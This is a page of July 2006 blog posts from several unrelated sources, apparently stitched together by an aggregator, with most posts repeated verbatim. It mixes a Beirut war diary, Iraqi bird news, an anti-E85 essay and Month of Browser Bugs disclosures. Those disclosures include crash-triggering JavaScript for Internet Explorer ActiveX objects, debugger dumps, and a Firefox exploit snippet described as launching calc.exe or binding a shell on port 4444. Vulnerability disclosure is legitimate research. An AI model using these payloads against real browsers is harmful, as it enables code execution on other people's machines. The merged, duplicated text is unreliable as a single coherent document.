Monday, July 31, 2006
Concluding the Month of Browser Bugs
The Month of Browser bugs is finished! Jericho was kind enough to write up a review of the MoBB project in the OSVDB Blog. Although the MoBB project is complete, this blog will continue to be used to publish new and interesting browser hacks. Aviv Raff and Pusscat have offered to help out in the coming months by moderating comments and publishing new browser-related security findings. Thanks again to everyone who submitted comments and otherwise participated in the project.
black dust
there is a black dust that is filling the air. we are breathing it in ... constantly. it has settled on my clothes, in my kitchen... it is everywhere. we are guessing it is from the Jiye power station that was bombed... it is still on fire... it is the power station from which the oil spill originated from.
today i had my first experience at queuing for gas. the shortages have arrived. so many gas stations have shut down. the few that are left have long queues.. i waited for 40 minutes.. and when my turn came, i was give $10 worth only.
i only have a few minutes left before the electricity gets cut. we are running on generator now and they usually turn it off at midnight...
everyone is talking about the depleted uranium in the bombs... it is everywhere now. in the air we breathe.. in the land... it will soon be in our crops... in our water... wow. every time i think that things can't get worse, they do.
i am already envisioning myself with cancer. i can feel it all around me. i don't know if i could be as strong as maya has been.
maya by the way is doing ok. she is now on about 5 different pain killers... they make her funny. whenever i call she answers... "hello. maya's house of pain.. can i help you." hehe. it's funnier when you hear it on the phone.
the sky is so dark tonight. there is no moon. beirut is quiet. death is all around me.
today i had my first experience at queuing for gas. the shortages have arrived. so many gas stations have shut down. the few that are left have long queues.. i waited for 40 minutes.. and when my turn came, i was give $10 worth only.
i only have a few minutes left before the electricity gets cut. we are running on generator now and they usually turn it off at midnight...
everyone is talking about the depleted uranium in the bombs... it is everywhere now. in the air we breathe.. in the land... it will soon be in our crops... in our water... wow. every time i think that things can't get worse, they do.
i am already envisioning myself with cancer. i can feel it all around me. i don't know if i could be as strong as maya has been.
maya by the way is doing ok. she is now on about 5 different pain killers... they make her funny. whenever i call she answers... "hello. maya's house of pain.. can i help you." hehe. it's funnier when you hear it on the phone.
the sky is so dark tonight. there is no moon. beirut is quiet. death is all around me.
MoBB #31: Safari KHTMLParser::popOneBlock
The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4 (PPC) system. Safari will dereference and call a pointer from the heap if a script element, inside a div element, redefines the document body. Code execution is possible, but more time is required to develop a reliable exploit. This bug was discovered by Jose Avila III and Pusscat. Strangely enough, this bug does not affect KDE's Konqueror (tested 3.5.3).
Please see the demo source code for an example.
Warning: The following link may cause your browser to crash.
Demonstration
Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand.
(gdb) x/i $pc
0x4aeec58: .long 0x690074
#0 0x04aeec58 in ?? ()
#1 0x95c6f884 in KHTMLParser::popOneBlock ()
#2 0x95c43998 in KHTMLParser::freeBlock ()
#3 0x95cdff3c in KHTMLParser::finished ()
#4 0x95cdfe7c in khtml::HTMLTokenizer::end ()
#5 0x95c7ec8c in khtml::HTMLTokenizer::finish ()
#6 0x95d90358 in KHTMLPart::endIfNotLoading ()
0x95c6f8c4 <_ZN11KHTMLParser11popOneBlockEb+132>: lwz r2,0(r3)
0x95c6f8c8 <_ZN11KHTMLParser11popOneBlockEb+136>: lwz r12,268(r2)
0x95c6f8cc <_ZN11KHTMLParser11popOneBlockEb+140>: mtctr r12
0x95c6f8d0 <_ZN11KHTMLParser11popOneBlockEb+144>: bctrl
This bug will be added to the OSVDB:
Apple Safari KHTMLParser::popOneBlock Code Execution
Please see the demo source code for an example.
Warning: The following link may cause your browser to crash.
Demonstration
Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand.
(gdb) x/i $pc
0x4aeec58: .long 0x690074
#0 0x04aeec58 in ?? ()
#1 0x95c6f884 in KHTMLParser::popOneBlock ()
#2 0x95c43998 in KHTMLParser::freeBlock ()
#3 0x95cdff3c in KHTMLParser::finished ()
#4 0x95cdfe7c in khtml::HTMLTokenizer::end ()
#5 0x95c7ec8c in khtml::HTMLTokenizer::finish ()
#6 0x95d90358 in KHTMLPart::endIfNotLoading ()
0x95c6f8c4 <_ZN11KHTMLParser11popOneBlockEb+132>: lwz r2,0(r3)
0x95c6f8c8 <_ZN11KHTMLParser11popOneBlockEb+136>: lwz r12,268(r2)
0x95c6f8cc <_ZN11KHTMLParser11popOneBlockEb+140>: mtctr r12
0x95c6f8d0 <_ZN11KHTMLParser11popOneBlockEb+144>: bctrl
This bug will be added to the OSVDB:
Apple Safari KHTMLParser::popOneBlock Code Execution
Sunday, July 30, 2006
Iraq records a critically endangered bird
One of the rarest birds in the world, the Northern Bald Ibis has been satellite tracked to extreme western Iraq during its migration south from the breeding grounds of the tiny remenant population of 13 birds in Syria (discovered in 2002) to Yemen. The name of the male bird tracked through Iraq is Salam (Peace). Hopefully, this name will be prophetic for both the birds and Iraq.
The bird was recorded in Iraq on the morning of July 18th having flown 207 km from its breeding grounds in Palmyra, Syria since the day before. The bird is currently in Western Yemen along with two other tagged birds.
The fact that there are more Northern Bald Ibis in capitivity than in the wild highlights their tenuous hold. Another small wild population exists in Morocco.
The bird once found throughout Europe and the Middle East has experience a spectacular decline. A colony in Turkey dropped from 600-800 pairs in 1954 to 6 pairs in 1980. It was last wild birds nested in 1989, when the remaining few birds were captured for a captive breeding program.
I previously had the Northern Bald Ibis listed as extirpated on the Iraqi list. I've happily changed the Bald Ibis status on the Iraqi checklist from extirpated to rare visitor. Historically there were a few colonies in Iraq. I couldn't find any references, save a map in the IUEP Action Plan for the Northern Bald Ibis.
After going undiscovered for so long in Syria, perhaps there is a chance that other relict colonies exist in Syria and maybe even remote areas of Iraq.
One of the rarest birds in the world, the Northern Bald Ibis has been satellite tracked to extreme western Iraq during its migration south from the breeding grounds of the tiny remenant population of 13 birds in Syria (discovered in 2002) to Yemen. The name of the male bird tracked through Iraq is Salam (Peace). Hopefully, this name will be prophetic for both the birds and Iraq.
The bird was recorded in Iraq on the morning of July 18th having flown 207 km from its breeding grounds in Palmyra, Syria since the day before. The bird is currently in Western Yemen along with two other tagged birds.
The fact that there are more Northern Bald Ibis in capitivity than in the wild highlights their tenuous hold. Another small wild population exists in Morocco.
The bird once found throughout Europe and the Middle East has experience a spectacular decline. A colony in Turkey dropped from 600-800 pairs in 1954 to 6 pairs in 1980. It was last wild birds nested in 1989, when the remaining few birds were captured for a captive breeding program.
I previously had the Northern Bald Ibis listed as extirpated on the Iraqi list. I've happily changed the Bald Ibis status on the Iraqi checklist from extirpated to rare visitor. Historically there were a few colonies in Iraq. I couldn't find any references, save a map in the IUEP Action Plan for the Northern Bald Ibis.
After going undiscovered for so long in Syria, perhaps there is a chance that other relict colonies exist in Syria and maybe even remote areas of Iraq.
beirut update
dear citizens of earth,
please do not post political comments or comments of hate or blame on my blog. though i appreciate that everyone is entitled to their opinions, i do not want my blog to be a platform for political debate.
i am an artist, not a politician.
our beautiful world is in such a fragile state right now. let us rise above hate.
remember love.
remember love.
please do not post political comments or comments of hate or blame on my blog. though i appreciate that everyone is entitled to their opinions, i do not want my blog to be a platform for political debate.
i am an artist, not a politician.
our beautiful world is in such a fragile state right now. let us rise above hate.
remember love.
remember love.
chasing oil
yesterday, a few of us got into a car and drove up the Lebanese coast line, northwards...in order to document the oil spill. we took pictures, video, and prepared a map that traced the movement of the oil slick.
though i was on the edge of having a panic attack the whole time, being afraid that at any time, the road, bridge or tunnel we were on could be bombed... it felt good to finally get out of beirut for a few hours... first time in a long time.
what we saw was horrendous. our glorious beaches... all covered in black. bays, rocks, crevices, hidden under a blanket of oil. i can not tell you how big this spill is. we went as far up as Anfe (which is about 10 minutes before Tripoli) before we had to turn back to Beirut in oder to make it to our evening interviews on time. the oil slick continues to travel north, eating up everything in its path. we heard it was reached Syria now.
Byblos (Jbeil) bay is completely smothered. this once picturesque and touristic town, also the oldest port city on Earth, is in ruins. we could smell the oil before we were anywhere close to the bay. this summer, the town was planning to celebrate its 7,000th birthday! there were huge festivities planned... so much went into it... now... nothing but this black plague.
we stopped to speak with a few fishermen. they are completely devastated. they have no means of income anymore. so many of them had fixed up their boats for this summer i hopes of giving tourists small boat trips around the coast. now, that is gone too.
i had a really bad headache all day... we were driving on the coastal road, stopped every few minutes to document.... the smell was so strong. when i got home, i blew my nose and the tissue was all black. i made sure to take a really good shower.
we were going to send out the press release, pics and video today, but we got even worse news...
there had been a massacre in Qana early this morning. history repeats itself. the Israelis dropped a bomb on a building that was sheltering refugees. the news at this point is that 55 were killed. mostly women and children... but the numbers are growing. the news is still fresh. it was only a few years ago that the Israelis did the same thing, except last time, it was a UN building that they hit. and over 100 people were killed. mostly women and children killed... why?? how can anyone be so inhumane?
i think Israel is the only country in the world that is allowed to hit UN posts and get away with it. only a few days ago, an UN post was hit in the South. UN peacekeepers died. to their families, i beg forgiveness. Lebanon is a beautiful country.. full of beautiful people. we all mourn your loss.
this whole attack has been one massacre after another. and still they persist. and still, it continues...
though i was on the edge of having a panic attack the whole time, being afraid that at any time, the road, bridge or tunnel we were on could be bombed... it felt good to finally get out of beirut for a few hours... first time in a long time.
what we saw was horrendous. our glorious beaches... all covered in black. bays, rocks, crevices, hidden under a blanket of oil. i can not tell you how big this spill is. we went as far up as Anfe (which is about 10 minutes before Tripoli) before we had to turn back to Beirut in oder to make it to our evening interviews on time. the oil slick continues to travel north, eating up everything in its path. we heard it was reached Syria now.
Byblos (Jbeil) bay is completely smothered. this once picturesque and touristic town, also the oldest port city on Earth, is in ruins. we could smell the oil before we were anywhere close to the bay. this summer, the town was planning to celebrate its 7,000th birthday! there were huge festivities planned... so much went into it... now... nothing but this black plague.
we stopped to speak with a few fishermen. they are completely devastated. they have no means of income anymore. so many of them had fixed up their boats for this summer i hopes of giving tourists small boat trips around the coast. now, that is gone too.
i had a really bad headache all day... we were driving on the coastal road, stopped every few minutes to document.... the smell was so strong. when i got home, i blew my nose and the tissue was all black. i made sure to take a really good shower.
we were going to send out the press release, pics and video today, but we got even worse news...
there had been a massacre in Qana early this morning. history repeats itself. the Israelis dropped a bomb on a building that was sheltering refugees. the news at this point is that 55 were killed. mostly women and children... but the numbers are growing. the news is still fresh. it was only a few years ago that the Israelis did the same thing, except last time, it was a UN building that they hit. and over 100 people were killed. mostly women and children killed... why?? how can anyone be so inhumane?
i think Israel is the only country in the world that is allowed to hit UN posts and get away with it. only a few days ago, an UN post was hit in the South. UN peacekeepers died. to their families, i beg forgiveness. Lebanon is a beautiful country.. full of beautiful people. we all mourn your loss.
this whole attack has been one massacre after another. and still they persist. and still, it continues...
Saturday, July 29, 2006
MoBB #30: Orphan Object Properties
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was discovered by Aviv Raff while working on a new browser fuzzing tool. It is possible to trigger a NULL dereference by accessing the property of an object that is inside a deleted frame.
Please see the demo source code for an example.
Demonstration
eax=00000000 ebx=01ba7180 ecx=00000000
edx=7dc95b90 esi=00000000 edi=00000000
eip=7dc9d8ba esp=0013dc98 ebp=0013dccc
mshtml!CMarkup::EnsureTopElems+0xc:
7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????
This bug will be added to the OSVDB:
Microsoft IE Orphan Object Property Access NULL Dereference
Please see the demo source code for an example.
Demonstration
eax=00000000 ebx=01ba7180 ecx=00000000
edx=7dc95b90 esi=00000000 edi=00000000
eip=7dc9d8ba esp=0013dc98 ebp=0013dccc
mshtml!CMarkup::EnsureTopElems+0xc:
7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????
This bug will be added to the OSVDB:
Microsoft IE Orphan Object Property Access NULL Dereference
while i was building dreams, they were preparing my destruction
the latest in my inbox today... i have now heard from more than one source that these attacked have been planned all along.
"Of all of Israel's wars since 1948, this was the one for which Israel
was most prepared," Gerald Steinberg, a political science professor at
Israel's Bar-Ilan University, told the San Francisco Chronicle
(7/21/05). "By 2004, the military campaign scheduled to last about
three weeks that we're seeing now had already been blocked out and, in
the last year or two, it's been simulated and rehearsed across the
board." The Chronicle reported that a "senior Israeli army officer"
has been giving PowerPoint presentations for more than a year to "U.S.
and other diplomats, journalists and think tanks" outlining the coming
war with Lebanon, explaining that a combination of air and ground
forces would target Hezbollah and "transportation and communication
arteries."
http://www.fair.org/index.php?page=2928
can someone tell me why i wasn't notified? they tell the press, but they don't tell me? boy do i feel stupid.
today i feel so stupid.
for the last six years, i have been making plans. i have been building dreams. i got married. i bought a home. i painted. i exhibited. i made plans with people... for them to come here. i invested time, emotions, money, ideas, love... into lebanon.
for the last six years, i have been building bridges. from beirut to new york. from beirut to everywhere.
for the last six years, i have made new friends. i have met with people. i have made contacts. i have made committments.
for the last six years, i promised people things. at work, at home, with friends...
for the last six years, i have been encouraging others to paint, sculpt, draw, film, photographs, make, stick, sew, create... i promised them that their work would get somewhere... that is was so important to make work... that lebanon was embracing the arts.. and we just had to direct it.
for the last six years, i promised my parents a family. i promised them grandchildren.
for the last six years, i promised my best friends a beirut that our kids would love. a beirut that would be healthy for ourselves and our friends. a beirut that would be unlike any other city in the world.
i just wish i got to see the power point presentation.. then i wouldn't have wasted my time on so much hope. while i was building dreams... they were preparing my destruction. why???????????
yes, dear reader, i am becoming angry and cynical. this is what happens when you stop sleeping. this is what happens when you stop eating. this is what happens when your dreams are shattered. this is what happens when your country is violated.
but, i will not hate. i will never hate. i am just really really disappointed by these people who feel they have the right to govern my life.
only thing left to do now is to resist. resist with love. my most powerful weapon that no one can touch.
i still love. i will always love. i love beirut.
"Of all of Israel's wars since 1948, this was the one for which Israel
was most prepared," Gerald Steinberg, a political science professor at
Israel's Bar-Ilan University, told the San Francisco Chronicle
(7/21/05). "By 2004, the military campaign scheduled to last about
three weeks that we're seeing now had already been blocked out and, in
the last year or two, it's been simulated and rehearsed across the
board." The Chronicle reported that a "senior Israeli army officer"
has been giving PowerPoint presentations for more than a year to "U.S.
and other diplomats, journalists and think tanks" outlining the coming
war with Lebanon, explaining that a combination of air and ground
forces would target Hezbollah and "transportation and communication
arteries."
http://www.fair.org/index.php?page=2928
can someone tell me why i wasn't notified? they tell the press, but they don't tell me? boy do i feel stupid.
today i feel so stupid.
for the last six years, i have been making plans. i have been building dreams. i got married. i bought a home. i painted. i exhibited. i made plans with people... for them to come here. i invested time, emotions, money, ideas, love... into lebanon.
for the last six years, i have been building bridges. from beirut to new york. from beirut to everywhere.
for the last six years, i have made new friends. i have met with people. i have made contacts. i have made committments.
for the last six years, i promised people things. at work, at home, with friends...
for the last six years, i have been encouraging others to paint, sculpt, draw, film, photographs, make, stick, sew, create... i promised them that their work would get somewhere... that is was so important to make work... that lebanon was embracing the arts.. and we just had to direct it.
for the last six years, i promised my parents a family. i promised them grandchildren.
for the last six years, i promised my best friends a beirut that our kids would love. a beirut that would be healthy for ourselves and our friends. a beirut that would be unlike any other city in the world.
i just wish i got to see the power point presentation.. then i wouldn't have wasted my time on so much hope. while i was building dreams... they were preparing my destruction. why???????????
yes, dear reader, i am becoming angry and cynical. this is what happens when you stop sleeping. this is what happens when you stop eating. this is what happens when your dreams are shattered. this is what happens when your country is violated.
but, i will not hate. i will never hate. i am just really really disappointed by these people who feel they have the right to govern my life.
only thing left to do now is to resist. resist with love. my most powerful weapon that no one can touch.
i still love. i will always love. i love beirut.
MoBB #29: ADODB.Recordset NextRecordset
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the NextRecordset method repeatedly with a long string can result in an invalid memory access inside the SysFreeString function. This bug is similar to MoBB #8 and MoBB #21.
var a = new ActiveXObject('ADODB.Recordset');
var b = 'XXXX';
while (b.length <= 1024*512) b+=b;
for (var i = 0; i < 32768; i++) try { a.NextRecordset(b); } catch(e) {}
Demonstration
eax=00181358 ebx=0013b1c4 ecx=00000007
edx=0000400c esi=02d30020 edi=00000008
eip=77124874 esp=0013ae68 ebp=0013ae6c
OLEAUT32!SysFreeString+0x45:
77124874 8b0e mov ecx,[esi] ds:0023:02d30020=???
This bug will be added to the OSVDB:
Microsoft IE ADODB.Recordset SysFreeString Invalid Length
var a = new ActiveXObject('ADODB.Recordset');
var b = 'XXXX';
while (b.length <= 1024*512) b+=b;
for (var i = 0; i < 32768; i++) try { a.NextRecordset(b); } catch(e) {}
Demonstration
eax=00181358 ebx=0013b1c4 ecx=00000007
edx=0000400c esi=02d30020 edi=00000008
eip=77124874 esp=0013ae68 ebp=0013ae6c
OLEAUT32!SysFreeString+0x45:
77124874 8b0e mov ecx,[esi] ds:0023:02d30020=???
This bug will be added to the OSVDB:
Microsoft IE ADODB.Recordset SysFreeString Invalid Length
Friday, July 28, 2006
tax dollars
it's almost 5 am and i can't sleep. that noisy propeller sounding plane is flying over my house again. i think it's a spy plane. the noise is pretty constant. as if it is hovering just above my roof.
we heard today that Israeli troops are pulling out a little in the South. Does this mean that their new shipment of bombs have arrived? the expedited delivery from America? they don't have to sacrifice soldiers on the ground anymore... now they can just blow us up from the skies.
here we go, ladies and gentlemen, a new round of bombings... what is there left to bomb anyway? the South of Lebanon is on fire. Saida is on fire. Beirut is on fire. i can't keep track of things.
biggest joke of the week: Condi went to Rome to try and make peace, but in the meantime America is sending Israel new bombs.
can someone tell me what they were thinking?
and worst news of all... with all this attention on Lebanon, the world is not paying attention to the new attacks on Gaza. for the last 2 days there has been constant shelling on Gaza. the sick joke here is that the Israelis were upset about having to pull out of the South, so they are taking it out on the Palestinians now.
when will we all learn that violence begets violence.
my dear american friends, your tax dollars are really starting to annoy me. no matter how much you protest the idea, you are all involved in this as much as i am. i know so many of you are protesting this, but it seems like your congress is not. if you really want to help me here, please speak to your congress. ask them to stop this madness.
we heard today that Israeli troops are pulling out a little in the South. Does this mean that their new shipment of bombs have arrived? the expedited delivery from America? they don't have to sacrifice soldiers on the ground anymore... now they can just blow us up from the skies.
here we go, ladies and gentlemen, a new round of bombings... what is there left to bomb anyway? the South of Lebanon is on fire. Saida is on fire. Beirut is on fire. i can't keep track of things.
biggest joke of the week: Condi went to Rome to try and make peace, but in the meantime America is sending Israel new bombs.
can someone tell me what they were thinking?
and worst news of all... with all this attention on Lebanon, the world is not paying attention to the new attacks on Gaza. for the last 2 days there has been constant shelling on Gaza. the sick joke here is that the Israelis were upset about having to pull out of the South, so they are taking it out on the Palestinians now.
when will we all learn that violence begets violence.
my dear american friends, your tax dollars are really starting to annoy me. no matter how much you protest the idea, you are all involved in this as much as i am. i know so many of you are protesting this, but it seems like your congress is not. if you really want to help me here, please speak to your congress. ask them to stop this madness.
thank you
so, i have not been able to draw or paint since the attacks started, but a dear friend and wonderful artist, Emily Jacir, saw to it that somehow, art could be made out of all of this.
Emily who is currently in NYC asked some of her students to make street art/ community activism art out of some of her emails, she printed out for them, from the last two weeks. she asked them to "go out into the streets and do something in the public sphere based on their interaction, (or reaction) or whatever with the emails." a few students got some of my emails..and have been able to make the art i haven't been able to make.
thank you, Emily. and thank your students.
the media can say all they want, but art always tells the truth.
you can read more about this on electronic intifada:
http://electronicintifada.net/v2/article5301.shtml
the pic above was taken by Emily.
a crab eulogy
by the way, we tried to wash the crab. tried to save it. but the oil wouldn't come off. it was so thick. we had to leave him on the beach. i want to take this moment to mourn all our sea life and animals that succumbed or will succumb to this senseless and unjust war. i apologize on behalf of mankind who can be really stupid sometimes. we invade your space, your habitats... we impose our way of life on you... we drag you into our mess... for this, i am so sorry. dearest Mother Nature, i hope you can find a way to forgive us. we still have so much to learn.
Thursday, July 27, 2006
MoBB #28: Mozilla Navigator Object
The following bug (mfsa2006-45) was tested on Firefox 1.5.0.4 running on Windows 2000 SP4, Windows XP SP2, and a recently updated Gentoo Linux system. This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is trivial to turn into a working exploit. The demonstration link below will attempt to launch "calc.exe" on Windows systems, execute "touch /tmp/METASPLOIT" on Linux systems, and bind a command shell to port 4444 for Mac OS X Intel and PowerPC systems (thanks Todd and nemo!).
window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);
Demonstration
This bug has been added to the OSVDB:
Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution
window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);
Demonstration
This bug has been added to the OSVDB:
Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution
Good News for the Endangered Basra Reed Warbler
Birdlife International has announced the discovery of breeding Basrah Reed Warblers far out of the known breeding areas of Iraq and Iran. 4 birds including a recently fledged juvenile were found in Israel's Hula Valley in June 2006. A newly discovered disjunct population would be great news for this ICUN Red-listed species. The revegetation of the southern marshes of Iraq also bode well for this small songbird whose population may have dropped up to 80% since the early 1970's. In Iraq the bird has been found in reed-filled marshes and riverbanks from Baghdad to the Shatt Al-Arab marshes in the south. In 1981 a survey reported breeding birds in the Jadriyah section of Baghdad right across the river from the Green Zone. The birds might survive in small patches in greater Baghdad, though the original site now has been significantly degraded. The stronghold remains the lower Mesopotamian marshes.
Birdlife International has announced the discovery of breeding Basrah Reed Warblers far out of the known breeding areas of Iraq and Iran. 4 birds including a recently fledged juvenile were found in Israel's Hula Valley in June 2006. A newly discovered disjunct population would be great news for this ICUN Red-listed species. The revegetation of the southern marshes of Iraq also bode well for this small songbird whose population may have dropped up to 80% since the early 1970's. In Iraq the bird has been found in reed-filled marshes and riverbanks from Baghdad to the Shatt Al-Arab marshes in the south. In 1981 a survey reported breeding birds in the Jadriyah section of Baghdad right across the river from the Green Zone. The birds might survive in small patches in greater Baghdad, though the original site now has been significantly degraded. The stronghold remains the lower Mesopotamian marshes.
MoBB #27: NDFXArtEffects RGBExtraColor
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. stack overflow can occur by setting one of the RGBExtraColor, RGBForeColor, and RGBBackColor properties to a long string value. Since the entire string is placed into a stack buffer, you are able to select exactly what instruction to fault on based on the length of the string. Does anyone know of a way to exploit this for something besides a crash?
var b = 'XXXX';
while(b.length <=1024*1024) b+=b;
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0,i);
Demonstration
eax=4db88a05 ebx=000f8201 ecx=7c809f8a
edx=0013b274 esi=02f50024 edi=00000000
eip=4db88a11 esp=00043000 ebp=0013b254
wmm2fxb!DXColorFromBSTR+0xc8:
4db88a11 57 push edi
This bug will be added to the OSVDB:
Microsoft IE NDFXArtEffects Multiple Property Stack Overflow
var b = 'XXXX';
while(b.length <=1024*1024) b+=b;
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0,i);
Demonstration
eax=4db88a05 ebx=000f8201 ecx=7c809f8a
edx=0013b274 esi=02f50024 edi=00000000
eip=4db88a11 esp=00043000 ebp=0013b254
wmm2fxb!DXColorFromBSTR+0xc8:
4db88a11 57 push edi
This bug will be added to the OSVDB:
Microsoft IE NDFXArtEffects Multiple Property Stack Overflow
Wednesday, July 26, 2006
Is Ethanol / E85 Fuel the Solution?
I've recently received a number of emails calling for me to Kick the Oil Habit by supporting E85 which is a liquid fuel made up of 85% ethanol and 15% regular gasoline. Having previously had my doubts about ethanol I emailed fellow blogger the Engineer Poet seeking his opinion. A large part of this resulting post is based directly on his reply and as such the credit belongs to him.
So is E85 fuel the answer to America's (and the world's) addiction to oil?
E85 fuel is not the solution. It is not even a part of the solution, it is a part of the problem. Here's why, in a nutshell:
All US vehicles can burn 10% ethanol (E10), but the US does not even produce half as much ethanol as universal E10 would require. We make about 5 billion gallons of ethanol, but use 140 billion gallons of gas.
E85 and "flex fuel" is a loophole for the automakers to sell guzzlers without having to pay CAFE penalties. It makes the problem worse. Ending the loophole probably means ending E85, because there is no other reason for it to exist.
Since the best estimate is that every gallon-equivalent of ethanol takes about 4/5 of a gallon-equivalent of other fossil fuel to make it, each gallon of E85 really represents about 0.6 gallons-equivalent of various fossil fuels. Since most flex-fuel vehicles get roughly 2/3 the mileage on E85 as they do on gasoline, they burn about 90% as much fossil energy even at their best.
Even if we can use "cellulosic ethanol" to reduce the inputs of fossil-derived fertilizer and whatnot, we can't make enough no matter what we do. The efficiency of the average gasoline-powered vehicle is about 15%, and we just can't grow enough inputs to make up for throwing 85% of our produced energy away. The most efficient use of biomass is in local combined heat and power plants, not as a feedstock for ethanol.
Low corn prices and high oil prices, and a government subsidy of 51 cents per gallon have fuelled unprecedented growth of the ethanol industry. In the case of the U.S. ethanol industry, fossil fueled trucks ship the fuel halfway across the country from the population sparse corn belt to population and car dense states like California and Texas. Science magazine found only a 13% reduction in CO2 emissions for bioethanol over gasoline (and only 11% for E85 fuel). U.S. government federal records show a single ADM corn processing plant in Clinton, Iowa generated nearly 20,000 tons of pollutants including sulfur dioxide, nitrogen oxides, and volatile organic compounds in 2004. The EPA considers an ethanol plant as a "major source" of pollution if it produces more than 100 tons of any one pollutant per year. From an emissions standpoint it is far preferable to drive a fuel efficient gasoline car than a low efficiency flex fuel vehicle running on E85.
E85 fuel is not a solution. It is a distraction, like hydrogen vehicles. Further, every E85 vehicle is also a gasoline-compatible vehicle. It will maintain demand for petroleum as long as it is on the road. If you want to end oil addiction you have to get rid of the things which use it.
E85 ethanol fuel may make a small contribution now, but it is a dead end. If we want to really be free of fossil fuels (including imported oil), we have to re-think things as completely as changing from riding horses to driving motor cars.
Ethanol has already created an addiction of its own. The farmers and agribusiness interests which got into it found it hugely profitable, and they have big investments in its continuation. Even if you developed a better way of using corn today, you'd still have a lot of money lobbying to use it for ethanol, and even force it to be used for ethanol.
This is already a race between technologies which can make us independent of fossil fuel, and technologies which get subsidy money. In that race, the subsidy seems to win every time. At least 43 percent of Archer Daniels Midland's annual profits are from products heavily subsidized or protected by the American government. For every $1 of profit earned by ADM's ethanol operation (the largest in the U.S.), it costs taxpayers $30. If you subsidize a technology which can only replace half our gasoline (and none of our diesel, jet fuel, or anything else), you're probably going to be stuck with it.
A hobbyist wrote an article about his home-built plug-in hybrid electric vehicle (PHEV). He published this article in Mother Earth News... in 1978.
We don't need any new technology. We could be building these cars today. Heck, we could have been building them in 1995 (when the CARB ZEV mandate came in)... or maybe even 1985. They would have been crude, but they would have gotten the job done. We can do far better today, of course.
People finally got fed up and started building their own PHEV's out of Toyota Priuses. It's time to quit the excuses, both making them and accepting them.
CAFE regulations utterly failed to contain U.S. motor-fuel consumption. This is not opinion, this is historical fact. Now the E85 fuel campagin wants to do the same thing again, but "reduce" consumption with E85 instead of directly cutting gallons-per-mile. You'll get the same result as before - if driving doesn't cost more, people will continue to drive as much or more.
There are roughly 200 million light-duty vehicles in the USA. One recent news item says that there will be all of 6 million flex-fuel vehicles by 2007. That's a whole 3%.
The average flex-fuel vehicle is a guzzling truck (because they get the biggest CAFE preference from it). If those trucks get 13 MPG on E85, and they drive the national average of 13,000 miles/year, those 6 million vehicles would consume 5.1 billion gallons of ethanol. That's roughly the same as the total production capacity of the nation.
The E85 fuel campaign is currently sponsoring a road trip to highlight the usage of E85, but also the difficulty of driving a car solely on E85 due to its lack of availability.
the electric Tesla Roadster - 250 mile range, one cent a mile, 0-60 in 4 seconds, 130 mph top speed - photo from Autoblog Green
However, had this trip been made in a Tesla Roadster or tZero from AC Propulsion, it could have instead highlighted how EASY it is to get electricity wherever you are... even if you never stop at a filling station! Using non-toxic lithium-ion batteries they have a 250 mile range, charging overnight from an electric outlet.
E85 fuel is a distraction, a diversion, a red herring. Just as the switch to "hydrogen economy" (remember that?) was before it. Both require huge investment, new infrastructure and will not lead to a post-oil economy. The hydrogen economy was promoted principally by both automakers and oil companies as a stalling strategy to avoid having to change the way they currently do business. Oil companies were also aware in the unlikely event that the hydrogen economy did take off (with huge taxpayer subsidies) that they would be supplying hydrogen produced from natural gas which they were already profitting from. The automakers sat around lamenting the fact they couldn’t start to build cars as there are hardly any hydrogen filling stations and the energy companies would not open commercial hydrogen filling stations as there is no demand for them. While appearing to want to do something, both the automakers and energy companies continued for a few more years with business as usual.
The Nissan Armada promoted on the E85 fuel site - with no fuel economy figures indicated
The campaign for E85 fuel is somewhat similar. The automakers are eager to produce flex fuel vehicles which require a relatively cheap modification to the highly profitable gas guzzling SUVs they already produce. By backing E85 fuel they can continue to produce the highly inefficient vehicles while appearing to be green (as seen in GM's Live Green Go Yellow campaign). Car and Driver magazine estimates the CAFE loophole could have saved GM more than $200 million in fines in 2005 alone.
As GM admits the consumer can choose “to operate on gasoline or on a blend of 85% ethanol and 15% gasoline. So, you can choose the fuel that's best for you. That's good to know, because E85 fuel is not yet widely available.” In other words in the vast majority of cases your new flex fuel vehicle will still be running on regular gas. Charter members of the National Ethanol Vehicle Coalition (NEVC), which promotes E85 fuel, when it was set up in June 2000 include GM, DaimlerChrsyler, and Ford.
Meanwhile E85 fuel is also been promoted by organisations such as the National Corn Growers Association, as well as regional and state corn growers organisations, associated agribusinesses and biofuel companies. All of which have a commercial interest in promoting E85 fuel. According to the Center for Responsive Politics, a clearinghouse on political donations, the agribusiness sector has funneled more than $190 million into federal election campaigns since the 2000 election cycle. In the NEVC’s bylaws its purpose is described as to "ensure that as decisions regarding the future of America’s use of alternative forms of transportation fuels are being made, ethanol has a role in the nation’s alternative transportation fuel market and support the expanded use of ethanol" and to "advance legislative proposals" to this effect. This seems to be regardless of whether ethanol/ E85 fuel is the best or is even a good solution to our energy challenges.
As the Engineer Poet points out in this post, burning fuel for transportation is very inefficient way of using energy. Whether you are fed up with the current use of petroleum for transportation for environmental, political or financial reasons E85 fuel is simply not the answer. What we need is a step change, as represented by moving from using gas burning vehicles to electric vehicles.
To encourage this, I urge you to sign this online plug in hybrid campaign asking automakers to produce plug-in hybrid electric vehicles (PHEVs).
Autoblog Green's exclusive interview with Tesla Motors' chairman
Tesla Roadster Video
Archer Daniels Midland (ADM) - the Largest U.S. Ethanol Producer
Vinod Khosla Debunked
